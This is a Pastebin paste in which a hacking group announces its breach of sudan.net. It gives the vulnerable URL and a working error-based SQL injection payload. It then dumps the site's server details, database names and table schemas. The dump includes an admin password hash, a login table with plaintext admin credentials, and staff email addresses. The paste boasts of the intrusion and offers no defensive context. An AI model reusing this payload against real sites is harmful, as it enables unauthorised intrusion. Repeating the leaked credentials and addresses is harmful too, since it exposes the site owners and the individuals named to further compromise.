API tools faq
paste
Ap3xH4x0r

Sudan.net #hacked #AnonSec

Ap3xH4x0r
Nov 25th, 2015
869
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.00 KB | None | 0 0
raw download clone embed print report
  1.  
  2. _____ _____ ______ _____ _____ ______ ______ ______ _____
  3. ___|\ \|\ \ |\ \ ____|\ \|\ \ |\ \ ___|\ \ ___|\ \ ___|\ \
  4. / /\ \\\ \| \ \ / /\ \\\ \| \ \ | |\ \| \ \ / /\ \
  5. | | | |\| \ \ | / / \ \\| \ \ | | |/____/|| ,_____/|| | | |
  6. | |__| | | \ | || | | || \ | | ___| \| | || \--'\_|/| | |____|
  7. | .--. | | \ | || | | || \ | || \ \___|/ | /___/| | | ____
  8. | | | | | |\ \| ||\ \ / /|| |\ \| || |\ \ | \____|\ | | | |
  9. |____| |____| |____||\_____/|| \_____\/____/ ||____||\_____/||\ ___\|_____| |____ ' /||\ ___\/ /|
  10. | | | | | |/ \| || \ | || | /| |/ \| ||| | | | | /_____/ || | /____/ |
  11. |____| |____| |____| |___|/ \|____||____|/ |____| |___|/ \|____|_____| |____| | / \|___| | /
  12. |_____|/ |____|/
  13. Laughing at your security since 2012
  14.  
  15. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - Th3 Ap3x - OverKiller
  16. Cyb3r Shzz0r - Mr. BlackList - AN0NT0XIC - Ny0g3n - ThaNarcissist - Mr.MaGnoM
  17.  
  18.  
  19.  
  20.  
  21.  
  22. Injection Point :: http://www.sudan.net/completenews.php?nsid=4925
  23.  
  24. Payload :: nsid=4925' AND (SELECT 7394 FROM(SELECT COUNT(*),CONCAT(0x7179737371,(SELECT (CASE WHEN (7394=7394) THEN 1 ELSE 0 END)),0x7177656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OrnE'='OrnE
  25.  
  26. web application technology :: Apache 2.2.29, PHP 5.4.37
  27. back-end DBMS :: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  28.  
  29. current user: 'sudanne_sudannet@localhost'
  30.  
  31. available databases [3]:
  32. [*] information_schema
  33. [*] sudanne_openads
  34. [14 tables]
  35. +--------------------+
  36. | phpads_acls |
  37. +----------------+------------------+
  38. | Column | Type |
  39. +----------------+------------------+
  40. | bannerid | mediumint(9) |
  41. | comparison | char(2) |
  42. | data | text |
  43. | executionorder | int(10) unsigned |
  44. | logical | set('and','or') |
  45. | type | varchar(16) |
  46. +----------------+------------------+
  47. | phpads_adclicks |
  48. +----------+--------------+
  49. | Column | Type |
  50. +----------+--------------+
  51. | bannerid | mediumint(9) |
  52. | country | char(2) |
  53. | host | varchar(255) |
  54. | source | varchar(50) |
  55. | t_stamp | timestamp |
  56. | zoneid | mediumint(9) |
  57. +----------+--------------+
  58. | phpads_adstats |
  59. +----------+-------------+
  60. | Column | Type |
  61. +----------+-------------+
  62. | day | date |
  63. | hour | tinyint(4) |
  64. | bannerid | smallint(6) |
  65. | clicks | int(11) |
  66. | source | varchar(50) |
  67. | views | int(11) |
  68. | zoneid | smallint(6) |
  69. +----------+-------------+
  70. | phpads_adviews |
  71. +----------+--------------+
  72. | Column | Type |
  73. +----------+--------------+
  74. | bannerid | mediumint(9) |
  75. | country | char(2) |
  76. | host | varchar(255) |
  77. | source | varchar(50) |
  78. | t_stamp | timestamp |
  79. | zoneid | mediumint(9) |
  80. +----------+--------------+
  81. | phpads_affiliates | (empty)
  82. +-------------+---------------+
  83. | Column | Type |
  84. +-------------+---------------+
  85. | language | varchar(64) |
  86. | affiliateid | mediumint(9) |
  87. | contact | varchar(255) |
  88. | email | varchar(64) |
  89. | name | varchar(255) |
  90. | password | varchar(64) |
  91. | permissions | mediumint(9) |
  92. | publiczones | enum('t','f') |
  93. | username | varchar(64) |
  94. | website | varchar(255) |
  95. +-------------+---------------+
  96. | phpads_banners |
  97. +--------------------+---------------------------------------------------------------+
  98. | Column | Type |
  99. +--------------------+---------------------------------------------------------------+
  100. | active | enum('t','f') |
  101. | alt | varchar(255) |
  102. | append | blob |
  103. | appendtype | tinyint(4) |
  104. | autohtml | enum('t','f') |
  105. | bannerid | mediumint(9) |
  106. | bannertext | blob |
  107. | bannertype | tinyint(4) |
  108. | block | int(11) |
  109. | capping | int(11) |
  110. | clientid | mediumint(9) |
  111. | compiledlimitation | blob |
  112. | contenttype | enum('gif','jpeg','png','html','swf','dcr','rpm','mov','txt') |
  113. | description | varchar(255) |
  114. | filename | varchar(255) |
  115. | height | smallint(6) |
  116. | htmlcache | blob |
  117. | htmltemplate | blob |
  118. | imageurl | varchar(255) |
  119. | keyword | varchar(255) |
  120. | pluginversion | mediumint(9) |
  121. | priority | int(11) |
  122. | seq | tinyint(4) |
  123. | status | varchar(255) |
  124. | storagetype | enum('sql','web','url','html','network','txt') |
  125. | target | varchar(24) |
  126. | transparent | enum('t','f') |
  127. | url | varchar(255) |
  128. | weight | tinyint(4) |
  129. | width | smallint(6) |
  130. +--------------------+---------------------------------------------------------------+
  131. | phpads_cache |
  132. +---------+--------------+
  133. | Column | Type |
  134. +---------+--------------+
  135. | cacheid | varchar(255) |
  136. | content | blob |
  137. +---------+--------------+
  138. | phpads_clients |
  139. +------------------+---------------+
  140. | Column | Type |
  141. +------------------+---------------+
  142. | language | varchar(64) |
  143. | activate | date |
  144. | active | enum('t','f') |
  145. | clicks | int(11) |
  146. | clientid | mediumint(9) |
  147. | clientname | varchar(255) |
  148. | clientpassword | varchar(64) |
  149. | clientusername | varchar(64) |
  150. | contact | varchar(255) |
  151. | email | varchar(64) |
  152. | expire | date |
  153. | parent | mediumint(9) |
  154. | permissions | mediumint(9) |
  155. | report | enum('t','f') |
  156. | reportdeactivate | enum('t','f') |
  157. | reportinterval | mediumint(9) |
  158. | reportlastdate | date |
  159. | target | int(11) |
  160. | views | int(11) |
  161. | weight | tinyint(4) |
  162. +------------------+---------------+
  163. | phpads_config |
  164. +-------------------------------+---------------+
  165. | Column | Type |
  166. +-------------------------------+---------------+
  167. | language | varchar(32) |
  168. | admin | varchar(64) |
  169. | admin_email | varchar(64) |
  170. | admin_email_headers | varchar(64) |
  171. | admin_fullname | varchar(255) |
  172. | admin_novice | enum('t','f') |
  173. | admin_pw | varchar(64) |
  174. | allow_invocation_frame | enum('t','f') |
  175. | allow_invocation_interstitial | enum('t','f') |
  176. | allow_invocation_js | enum('t','f') |
  177. | allow_invocation_local | enum('t','f') |
  178. | allow_invocation_plain | enum('t','f') |
  179. | allow_invocation_popup | enum('t','f') |
  180. | allow_invocation_xmlrpc | enum('t','f') |
  181. | auto_clean_tables | enum('t','f') |
  182. | auto_clean_tables_interval | tinyint(2) |
  183. | auto_clean_tables_vacuum | enum('t','f') |
  184. | auto_clean_userlog | enum('t','f') |
  185. | auto_clean_userlog_interval | tinyint(2) |
  186. | autotarget_factor | float |
  187. | begin_of_week | tinyint(2) |
  188. | client_welcome | enum('t','f') |
  189. | client_welcome_msg | text |
  190. | company_name | varchar(255) |
  191. | config_version | decimal(7,3) |
  192. | configid | tinyint(2) |
  193. | content_gzip_compression | enum('t','f') |
  194. | default_banner_weight | tinyint(4) |
  195. | default_campaign_weight | tinyint(4) |
  196. | gui_hide_inactive | enum('t','f') |
  197. | gui_link_compact_limit | int(11) |
  198. | gui_show_banner_html | enum('t','f') |
  199. | gui_show_banner_info | enum('t','f') |
  200. | gui_show_banner_preview | enum('t','f') |
  201. | gui_show_campaign_info | enum('t','f') |
  202. | gui_show_campaign_preview | enum('t','f') |
  203. | gui_show_matching | enum('t','f') |
  204. | gui_show_parents | enum('t','f') |
  205. | instance_id | varchar(64) |
  206. | main_back_color | varchar(7) |
  207. | maintenance_cron_timestamp | int(11) |
  208. | maintenance_timestamp | int(11) |
  209. | my_footer | varchar(255) |
  210. | my_header | varchar(255) |
  211. | name | varchar(32) |
  212. | override_gd_imageformat | varchar(4) |
  213. | percentage_decimals | tinyint(2) |
  214. | qmail_patch | enum('t','f') |
  215. | table_back_color | varchar(7) |
  216. | table_back_color_alternative | varchar(7) |
  217. | table_border_color | varchar(7) |
  218. | type_html_allow | enum('t','f') |
  219. | type_sql_allow | enum('t','f') |
  220. | type_txt_allow | enum('t','f') |
  221. | type_url_allow | enum('t','f') |
  222. | type_web_allow | enum('t','f') |
  223. | type_web_dir | varchar(255) |
  224. | type_web_ftp | varchar(255) |
  225. | type_web_mode | tinyint(2) |
  226. | type_web_url | varchar(255) |
  227. | updates_cache | text |
  228. | updates_dev_builds | enum('t','f') |
  229. | updates_enabled | enum('t','f') |
  230. | updates_last_seen | decimal(7,3) |
  231. | updates_timestamp | int(11) |
  232. | userlog_autoclean | enum('t','f') |
  233. | userlog_email | enum('t','f') |
  234. | userlog_priority | enum('t','f') |
  235. +-------------------------------+---------------+
  236. | phpads_images |
  237. +----------+--------------+
  238. | Column | Type |
  239. +----------+--------------+
  240. | contents | mediumblob |
  241. | filename | varchar(128) |
  242. | t_stamp | timestamp |
  243. +----------+--------------+
  244. | phpads_session |
  245. +-------------+-------------+
  246. | Column | Type |
  247. +-------------+-------------+
  248. | lastused | timestamp |
  249. | sessiondata | blob |
  250. | sessionid | varchar(32) |
  251. +-------------+-------------+
  252. | phpads_targetstats |
  253. +----------+-------------+
  254. | Column | Type |
  255. +----------+-------------+
  256. | day | date |
  257. | clientid | smallint(6) |
  258. | modified | tinyint(4) |
  259. | target | int(11) |
  260. | views | int(11) |
  261. +----------+-------------+
  262. | phpads_userlog |
  263. +-----------+--------------+
  264. | Column | Type |
  265. +-----------+--------------+
  266. | action | mediumint(9) |
  267. | timestamp | int(11) |
  268. | details | blob |
  269. | object | mediumint(9) |
  270. | userid | mediumint(9) |
  271. | userlogid | mediumint(9) |
  272. | usertype | tinyint(4) |
  273. +-----------+--------------+
  274. | phpads_zones |
  275. +-------------+--------------+
  276. | Column | Type |
  277. +-------------+--------------+
  278. | affiliateid | mediumint(9) |
  279. | append | blob |
  280. | appendtype | tinyint(4) |
  281. | chain | blob |
  282. | delivery | smallint(6) |
  283. | description | varchar(255) |
  284. | height | smallint(6) |
  285. | prepend | blob |
  286. | what | blob |
  287. | width | smallint(6) |
  288. | zoneid | mediumint(9) |
  289. | zonename | varchar(245) |
  290. | zonetype | smallint(6) |
  291. +-------------+--------------+
  292.  
  293.  
  294.  
  295. [*] sudanne_sudannet
  296. [49 tables]
  297. +-------------------------+
  298. | admin |
  299. +----------+--------------+
  300. | Column | Type |
  301. +----------+--------------+
  302. | password | varchar(255) |
  303. | username | varchar(255) |
  304. +----------+----------------------------------+
  305. | username | password |
  306. +----------+----------------------------------+
  307. | admin | 7391edbe8f3acbea449acdfa236ce878 |
  308. +----------+----------------------------------+
  309. | cms |
  310. +--------------+--------------+
  311. | Column | Type |
  312. +--------------+--------------+
  313. | cms_desc | text |
  314. | cms_flag | char(1) |
  315. | cms_id | int(11) |
  316. | cms_img | varchar(200) |
  317. | cms_title | varchar(255) |
  318. | page_desc | text |
  319. | page_keyword | text |
  320. | page_title | varchar(250) |
  321. +--------------+--------------+
  322. | gen_setting |
  323. +--------+---------+
  324. | Column | Type |
  325. +--------+---------+
  326. | email | text |
  327. | flag | char(1) |
  328. | id | int(11) |
  329. | type | char(1) |
  330. +----+------+------+-------------------+
  331. | id | flag | type | email |
  332. +----+------+------+-------------------+
  333. | 1 | y | c | muaz@sudan.net |
  334. | 2 | y | b | taxstar@gmail.com |
  335. +----+------+------+-------------------+
  336. | tblarcdgames |
  337. +------------+--------------+
  338. | Column | Type |
  339. +------------+--------------+
  340. | order | int(4) |
  341. | flag | char(1) |
  342. | gamesdesc | text |
  343. | gamesfile | varchar(250) |
  344. | gamesid | int(11) |
  345. | gamestitle | varchar(250) |
  346. | imagefile | varchar(250) |
  347. +------------+--------------+
  348. | tblarticlemaster |
  349. +------------------+--------------+
  350. | Column | Type |
  351. +------------------+--------------+
  352. | ArticleId | smallint(6) |
  353. | CategoryId | smallint(6) |
  354. | CreateDt | date |
  355. | CurrentStatus | smallint(6) |
  356. | Description | longtext |
  357. | DesignTemplateId | smallint(6) |
  358. | MetaTag | longtext |
  359. | SubCategoryId | smallint(6) |
  360. | SubSubCategoryId | smallint(6) |
  361. | Title | varchar(255) |
  362. +------------------+--------------+
  363. | tblbdwrds |
  364. +---------+--------------+
  365. | Column | Type |
  366. +---------+--------------+
  367. | bdword | varchar(255) |
  368. | bdwrdid | int(11) |
  369. +---------+--------------+
  370. | tblcard |
  371. +--------------+--------------+
  372. | Column | Type |
  373. +--------------+--------------+
  374. | card_desc | text |
  375. | card_id | int(11) |
  376. | card_img | varchar(255) |
  377. | card_img_alt | varchar(255) |
  378. | card_title | varchar(255) |
  379. | card_type | char(1) |
  380. | cat_id | int(11) |
  381. | flag | char(1) |
  382. +--------------+--------------+
  383. | tblcardcat |
  384. +----------+--------------+
  385. | Column | Type |
  386. +----------+--------------+
  387. | cat_id | int(11) |
  388. | category | varchar(250) |
  389. | flag | char(1) |
  390. +----------+--------------+
  391. | tblcardgreet |
  392. +-------------+--------------+
  393. | Column | Type |
  394. +-------------+--------------+
  395. | card_footer | varchar(255) |
  396. | card_header | varchar(255) |
  397. | card_id | int(11) |
  398. | card_msg | text |
  399. | femail | varchar(250) |
  400. | fname | varchar(250) |
  401. | greet_id | int(11) |
  402. | musicid | int(11) |
  403. | send_dt | date |
  404. | temail | varchar(250) |
  405. | tname | varchar(250) |
  406. +-------------+--------------+ (dumped)
  407. | tblcategory |
  408. +----------------+--------------+
  409. | Column | Type |
  410. +----------------+--------------+
  411. | alt_txt | varchar(250) |
  412. | cat_id | int(11) |
  413. | category_typ | char(1) |
  414. | catord | int(11) |
  415. | checkbox | char(1) |
  416. | ext_lnk | varchar(250) |
  417. | popupwin | char(1) |
  418. | sudan_category | varchar(250) |
  419. +----------------+--------------+
  420. | tblcategorymaster |
  421. +-----------------+--------------+
  422. | Column | Type |
  423. +-----------------+--------------+
  424. | CategoryId | smallint(6) |
  425. | CategoryName | varchar(100) |
  426. | CreateDt | datetime |
  427. | CurrentStatus | smallint(6) |
  428. | Description | longtext |
  429. | Sequence | smallint(6) |
  430. | StaticLink | char(1) |
  431. | StaticLinkName | varchar(255) |
  432. | TitleMetaDetail | longtext |
  433. +-----------------+--------------+
  434. | tblcms |
  435. +--------------+--------------+
  436. | Column | Type |
  437. +--------------+--------------+
  438. | cat_id | int(11) |
  439. | cms_desc | longtext |
  440. | cms_flag | char(1) |
  441. | cms_id | int(11) |
  442. | cms_img | varchar(200) |
  443. | cms_title | varchar(255) |
  444. | page_desc | text |
  445. | page_keyword | text |
  446. | page_title | varchar(250) |
  447. | page_url | varchar(250) |
  448. | scat_id | int(11) |
  449. +--------------+--------------+
  450. | tblcontacts |
  451. +----------+--------------+
  452. | Column | Type |
  453. +----------+--------------+
  454. | cntemail | varchar(250) |
  455. | cntid | int(11) |
  456. | cnttitle | varchar(250) |
  457. | flag | char(1) |
  458. +-------+------+------------------+---------------------+
  459. | cntid | flag | cnttitle | cntemail |
  460. +-------+------+------------------+---------------------+
  461. | 2 | y | *Sales | sales@sudan.net |
  462. | 3 | y | *Support | support@sudan.net |
  463. | 4 | y | *General Contact | webmaster@sudan.net |
  464. +-------+------+------------------+---------------------+
  465. | tbldesigntemplate |
  466. | tbleventmaster |
  467. | tblextlinkmaster |
  468. | tblgallerymaster |
  469. | tblgbsndmsg |
  470. | tblgbusr |
  471. +------------+--------------+
  472. | Column | Type |
  473. +------------+--------------+
  474. | admincmnts | text |
  475. | admindt | date |
  476. | country | varchar(255) |
  477. | email | varchar(255) |
  478. | flag | char(1) |
  479. | gb_id | int(11) |
  480. | homepage | varchar(255) |
  481. | message | text |
  482. | postdt | date |
  483. | usrname | varchar(255) |
  484. +------------+--------------+ (dumped)
  485. | tblimagemaster |
  486. | tbllinkmaster |
  487. | tbllogin |
  488. +------------------+--------------+
  489. | Column | Type |
  490. +------------------+--------------+
  491. | addscrollingnews | char(1) |
  492. | CurrentStatus | bigint(20) |
  493. | LoginId | smallint(6) |
  494. | massdelete | char(1) |
  495. | newscatids | varchar(255) |
  496. | Password | varchar(100) |
  497. | UserName | varchar(100) |
  498. +---------+------------+----------+----------+------------+---------------+------------------+
  499. | LoginId | newscatids | UserName | Password | massdelete | CurrentStatus | addscrollingnews |
  500. +---------+------------+----------+----------+------------+---------------+------------------+
  501. | 1 | NULL | admin | admin | Y | 0 | N |
  502. | 2 | NULL | News | news | Y | 1 | N |
  503. | 3 | NULL | press | press | Y | 2 | N |
  504. | 4 | NULL | comm | comm | Y | 3 | N |
  505. | 5 | NULL | test | test | Y | 1 | N |
  506. +---------+------------+----------+----------+------------+---------------+------------------+
  507. | tblmapstat |
  508. | tblnews |
  509. | tblnewscategory |
  510. | tblnewscategorymaster |
  511. | tblnewslogin |
  512. | tblnewsmaster |
  513. | tblnewstalkbk |
  514. | tblphotogal |
  515. | tblpollans |
  516. | tblpollattachid |
  517. | tblpollmaster |
  518. | tblpollques |
  519. | tblpollrslt |
  520. | tblproverbmaster |
  521. | tblrotmusic |
  522. | tblsectionmaster |
  523. | tblsettings |
  524. | tblsubcategory |
  525. | tblsubcategorymaster |
  526. | tblsubsubcategorymaster |
  527. | tbltalkbackmaster |
  528. | tbltopimg |
  529. | tblusers |
  530. +-----------+--------------+
  531. | Column | Type |
  532. +-----------+--------------+
  533. | email | varchar(30) |
  534. | firstname | varchar(255) |
  535. | flag | char(1) |
  536. | lastname | varchar(255) |
  537. | password | varchar(255) |
  538. | phone | int(25) |
  539. | user_id | int(25) |
  540. | username | varchar(255) |
  541. | website | varchar(50) | (dumped)
  542. +-----------+--------------+
  543. | tblweathericonmaster |
  544. | tblweathermaster |
  545. | vgb__country |
  546. | weather_xml |
  547. +-------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!